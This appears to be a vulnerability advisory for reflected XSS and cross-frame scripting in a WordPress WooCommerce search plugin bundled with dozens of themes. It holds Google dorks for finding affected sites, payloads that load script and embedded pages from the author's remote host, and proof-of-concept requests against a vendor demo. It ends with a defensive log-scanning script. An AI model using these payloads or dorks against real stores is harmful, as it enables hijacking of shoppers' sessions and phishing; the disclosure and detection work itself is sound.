[WordPress] SW Ajax WooCommerce Search plugin v1.2.6 — Unauthenticated Reflected XSS & XFS

[+] :: Exploit Title: SW Ajax WooCommerce Search plugin v1.2.6 - Unauthenticated Reflected XSS & XFS
[+] :: Google Dork: inurl:/wp-content/plugins/sw_ajax_woocommerce_search/
[+] :: Date: 2020-10-21
[+] :: Exploit Author: Ex.Mi [ https://ex-mi.ru ]
[+] :: Vendor: MagenTech | WPThemeGo [ https://www.magentech.com | http://www.wpthemego.com ]
[+] :: Software Version: 1.2.6
[+] :: Software Link: https://wpthemego.com/document/documentation-for-sw-ajax-woocommerce-search/
[+] :: Tested on: Kali Linux
[+] :: CVE:
[+] :: CWE: CWE-79, CWE-1021

[i] :: Info:
Unauthenticated Reflected XSS & XFS vulnerabilities were discovered in the SW Ajax WooCommerce Search plugin v1.2.6 for WordPress. Both issues come from the search term being reflected into the response without output encoding: the "s" parameter of the theme's search page and the "query" parameter of the sw_search_products_callback admin-ajax action (see the PoC requests below). The plugin ships bundled with a number of commercial themes, including: OneMall, Revo, eMarket, Autusin, Market, MaxShop, ShoppyStore, Furnicom, EtroStore, HiTheme, StyleShop, TopDeal, Victo, Avesa, Soaz, Binace, Houskit, Gaion, Furniki, Rozy, SecretSho, BosMarket, Siezz, HiStore, Ecomart, iMarket, NeoMarket, 9Merry, LeVogue, Floris, Alishop, KONStore, ShopyMall, DresShop, Shop4U, FurniHome, Tech8.

[!] :: Affected Themes (from ThemeForest):
OneMall [ https://themeforest.net/item/onemall-the-multipurpose-ecommerce-marketplace-wordpress-theme/20685400 ]
Revo [ https://themeforest.net/item/revo-multipurpose-responsive-woocommerce-theme/18276186 ]
eMarket [ https://themeforest.net/item/emarket-multipurpose-woocommerce-wordpress-theme/20492674 ]
Autusin [ https://themeforest.net/item/autusin-auto-parts-equipments-woocommerce-theme/22681468 ]
Market [ https://themeforest.net/item/market-responsive-woocommerce-wordpress-theme/9514470 ]
MaxShop [ https://themeforest.net/item/maxshop-responsive-wordpress-woocommerce-theme/11452732 ]
ShoppyStore [ https://themeforest.net/item/shoppystore-woocommerce-wordpress-theme/13607293 ]
Furnicom [ https://themeforest.net/item/furnicom-responsive-furniture-woocommerce-wordpress-theme/15548234 ]
EtroStore [ https://themeforest.net/item/etrostore-multipurpose-responsive-woocommerce-wordpress-theme/19250849 ]
HiTheme [ https://themeforest.net/item/hitheme-responsive-woocommerce-wordpress-theme/19618312 ]
StyleShop [ https://themeforest.net/item/styleshop-multipurpose-responsive-woocommerce-theme/19680545 ]
TopDeal [ https://themeforest.net/item/topdeal-responsive-woocommerce-wordpress-theme/20308469 ]
Victo [ https://themeforest.net/item/victo-ecommerce-marketplace-wordpress-theme/20728619 ]
Avesa [ https://themeforest.net/item/avesa-beauty-store-woocommerce-wordpress-theme/25696718 ]
Soaz [ https://themeforest.net/item/soaz-furniture-store-wordpress-woocommerce-theme/23858298 ]
Binace [ https://themeforest.net/item/binace-fashion-shop-wordpress-woocommerce-theme/22953765 ]
Houskit [ https://themeforest.net/item/houskit-interior-design-furniture-store-wordpress-theme/23527677 ]
Gaion [ https://themeforest.net/item/gaion-sport-accessories-shop-wordpress-woocommerce-theme/23068764 ]
Furniki [ https://themeforest.net/item/furniki-furniture-store-interior-design-wordpress-theme/22846033 ]
Rozy [ https://themeforest.net/item/rozy-flower-shop-woocommerce-theme/22640923 ]
SecretSho [ https://themeforest.net/item/secretsho-fashion-marketplace-wordpress-theme/22058416 ]
BosMarket [ https://themeforest.net/item/bosmarket-flexible-multivendor-woocommerce-wordpress-theme/21207492 ]
Siezz [ https://themeforest.net/item/siezz-modern-multipurpose-marketplace-wordpress-theme/21204130 ]
HiStore [ https://themeforest.net/item/histore-clean-ecommerce-marketplace-wordpress-theme/20906824 ]

[!] :: Affected Themes (from WPThemeGo):
iMarket [ https://wpthemego.com/item/imarket-creative-gift-shop-woocommerce-wordpress-theme/ ]
NeoMarket [ https://wpthemego.com/item/neomarket-modern-multi-vendor-woocommerce-wordpress-theme/ ]
EcoMart [ https://wpthemego.com/item/ecomart-organic-food-store-woocommerce-wordpress-theme/ ]
9Merry [ https://wpthemego.com/item/9merry-christmas-gifts-woocommerce-wordpress-theme/ ]
LeVogue [ https://wpthemego.com/item/levogue-fashion-shop-woocommerce-wordpress-theme/ ]
Floris [ https://wpthemego.com/item/floris-flower-shop-woocommerce-wordpress-theme/ ]
Alishop [ https://wpthemego.com/item/alishop-responsive-woocommerce-wordpress-theme/ ]
KONStore [ https://wpthemego.com/item/konstore-bridal-shop-woocommerce-wordpress-theme/ ]
ShopyMall [ https://wpthemego.com/item/shopymall-multi-vendor-marketplace-woocommerce-wordpress-theme/ ]
DresShop [ https://wpthemego.com/item/dresshop-fashion-shop-woocommerce-wordpress-theme/ ]
Shop4U [ https://wpthemego.com/item/shop4u-modern-marketplace-woocommerce-wordpress-theme/ ]
FurniHome [ https://wpthemego.com/item/furnihome-furniture-store-woocommerce-wordpress-theme/ ]
Tech8 [ https://wpthemego.com/item/tech8-digital-store-woocommerce-wordpress-theme/ ]

[%] :: Google Dorks:
/wp-content/themes/onemall/
/wp-content/themes/revo/
/wp-content/themes/emarket/
/wp-content/themes/autusin/
/wp-content/themes/market/
/wp-content/themes/maxshop/
/wp-content/themes/shoppystore/
/wp-content/themes/furnicom/
/wp-content/themes/etrostore/
/wp-content/themes/hitheme/
/wp-content/themes/styleshop/
/wp-content/themes/topdeal/
/wp-content/themes/victo/
/wp-content/themes/avesa/
/wp-content/themes/soaz/
/wp-content/themes/binace/
/wp-content/themes/houskit/
/wp-content/themes/gaion/
/wp-content/themes/furniki/
/wp-content/themes/rozy/
/wp-content/themes/secretsho/
/wp-content/themes/bosmarket/
/wp-content/themes/siezz/
/wp-content/themes/histore/
/wp-content/themes/ecomart/
/wp-content/themes/imarket/
/wp-content/themes/neomarket/
/wp-content/themes/9merry/
/wp-content/themes/levogue/
/wp-content/themes/floris/
/wp-content/themes/alishop/
/wp-content/themes/konstore/
/wp-content/themes/shopymall/
/wp-content/themes/dresshop/
/wp-content/themes/shop4u/
/wp-content/themes/furnihome/
/wp-content/themes/tech8/

[$] :: Payloads:
"><script src="https://ex-mi.ru/payload/a2r.js"></script>
"><embed src="https://ex-mi.ru/payload/xfsii.html">

[!] :: PoC Unauthenticated Reflected XSS:
https://demo.wpthemego.com/themes/sw_onemall/layout2/?category=&s=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fa2r.js%3E%3C%2Fscript%3E&search_posttype=product

[!] :: PoC Unauthenticated Reflected XSS (Burp Suite):
GET /themes/sw_onemall/layout2/?category=&s=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fa2r.js%3E%3C%2Fscript%3E&search_posttype=product HTTP/1.1
Host: demo.wpthemego.com

[!] :: PoC Unauthenticated XFS:
https://demo.wpthemego.com/themes/sw_onemall/layout2/?category=&s=%22%3E%3Cembed+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fxfsii.html%3E&search_posttype=product

[!] :: PoC Unauthenticated XFS (Burp Suite):
GET /themes/sw_onemall/layout2/wp-admin/admin-ajax.php?action=sw_search_products_callback&limit=5&search_type=0&query=%22%3E%3Cembed+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fxfsii.html%3E HTTP/1.1
Host: demo.wpthemego.com

[@] :: Contacts:
Website: ex-mi.ru
Telegram: @ex_mi
GitHub: @ex-mi
Medium: @ex.mi
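The two injection points shown in the PoC requests above (the front-end "s" search parameter and the "query" parameter of the sw_search_products_callback admin-ajax action) are easy to watch for in web-server access logs. The script below is an added detection example, not part of the original advisory: it percent-decodes each watched parameter repeatedly, so double-encoded payloads are not missed, and flags markup that has no business in a product search term. The log lines are constructed samples (example.invalid, documentation IP ranges), not real traffic.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Markup that should never appear in a shop search term.
TAG_RE = re.compile(r"<\s*/?\s*(script|embed|iframe|object|img|svg)\b", re.I)
EVENT_RE = re.compile(r"\bon[a-z]+\s*=", re.I)          # onerror=, onload=, ...
LOG_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')      # request target in combined log format

def decode_deep(value, rounds=3):
    """Percent-decode until stable so a double-encoded payload is still seen."""
    for _ in range(rounds):
        new = unquote_plus(value)
        if new == value:
            break
        value = new
    return value

def inspect_request(target):
    """Return [(param, decoded_value)] for every watched parameter carrying markup."""
    parts = urlsplit(target)
    qs = parse_qs(parts.query, keep_blank_values=True)
    # "query" is only the vulnerable sink when it feeds this specific AJAX action.
    is_sw_ajax = (parts.path.endswith("/wp-admin/admin-ajax.php")
                  and qs.get("action") == ["sw_search_products_callback"])
    findings = []
    for name, values in qs.items():
        if name == "s" or (name == "query" and is_sw_ajax):
            for raw in values:
                val = decode_deep(raw)
                if TAG_RE.search(val) or EVENT_RE.search(val):
                    findings.append((name, val))
    return findings

def scan_log(text):
    """Return [(line_no, param, decoded_value)] for each suspicious request line."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.search(line)
        if m:
            hits.extend((n, p, v) for p, v in inspect_request(m.group(1)))
    return hits

# Constructed sample access-log lines mirroring the PoC request shapes (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [21/Oct/2020:10:00:01 +0000] "GET /layout2/?category=&s=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fexample.invalid%2Fa.js%3E%3C%2Fscript%3E&search_posttype=product HTTP/1.1" 200 5120
203.0.113.5 - - [21/Oct/2020:10:00:02 +0000] "GET /wp-admin/admin-ajax.php?action=sw_search_products_callback&limit=5&search_type=0&query=%22%3E%3Cembed+src%3Dhttps%3A%2F%2Fexample.invalid%2Fx.html%3E HTTP/1.1" 200 880
198.51.100.9 - - [21/Oct/2020:10:00:03 +0000] "GET /layout2/?category=&s=red+sofa&search_posttype=product HTTP/1.1" 200 4096
"""

if __name__ == "__main__":
    for n, p, v in scan_log(SAMPLE_LOG):
        print(f"line {n}: parameter {p!r} carries markup: {v[:60]!r}")
```

The same checks can be ported to a WAF rule, but the durable fix is the plugin escaping the search term on output (esc_attr()/esc_html() in WordPress) before it is reflected into the page.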